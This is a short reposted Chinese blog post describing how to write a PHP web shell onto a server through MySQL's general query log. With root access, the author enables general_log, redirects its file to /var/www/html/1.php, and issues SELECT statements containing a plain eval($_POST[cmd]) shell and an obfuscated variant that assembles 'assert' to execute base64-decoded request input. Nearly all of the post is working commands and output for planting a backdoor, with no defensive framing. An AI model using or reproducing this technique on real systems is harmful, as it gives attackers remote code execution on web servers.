mysql的兼职技能

mysql 网络安全 shell 转载
转载验证
Publish Date:   2017-03-28

必须在mysql 的root权限下

查看general_log状态

mysql> show variables like '%general%';
+------------------+----------------------------+
| Variable_name    | Value                      |
+------------------+----------------------------+
| general_log      | OFF                        |
| general_log_file | /var/lib/mysql/itaken.log |
+------------------+----------------------------+
2 rows in set (0.22 sec)

mysql>

开启mysql查询日志, 设置日志文件路径

这里是存储了每一个sql语句执行的日志(包含SQL语句本身)

mysql> set global general_log = on;
Query OK, 0 rows affected (0.00 sec)

mysql> set global general_log_file = '/var/www/html/1.php';
Query OK, 0 rows affected (0.00 sec)

mysql> show variables like '%general%';
+------------------+---------------------+
| Variable_name    | Value               |
+------------------+---------------------+
| general_log      | ON                  |
| general_log_file | /var/www/html/1.php |
+------------------+---------------------+
2 rows in set (0.00 sec)

mysql>

1.php文件如果不存在,则会创建,所以该目录必须有创建文件权限, 否则会报错

mysql> set global general_log_file = '/var/www/html/1.php';
ERROR 29 (HY000): File '/var/www/html/1.php' not found (Errcode: 13 - Permission denied)

执行sql查询, 记录到日志

mysql> select '<?php eval($_POST[cmd]);?>';
+----------------------------+
| <?php eval($_POST[cmd]);?> |
+----------------------------+
| <?php eval($_POST[cmd]);?> |
+----------------------------+
1 row in set (0.00 sec)

mysql> SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>";
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| <?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?> |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| <?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?> |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>

原文: SQL语句利用日志写shell

参考文档

Author: Itaken
Link: https://itaken.github.io/2017/3/28/mysql%E6%96%B0%E6%8A%80%E8%83%BD/
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint polocy. If reproduced, please indicate source Itaken !
mysql 网络安全 shell 转载
  TOC目录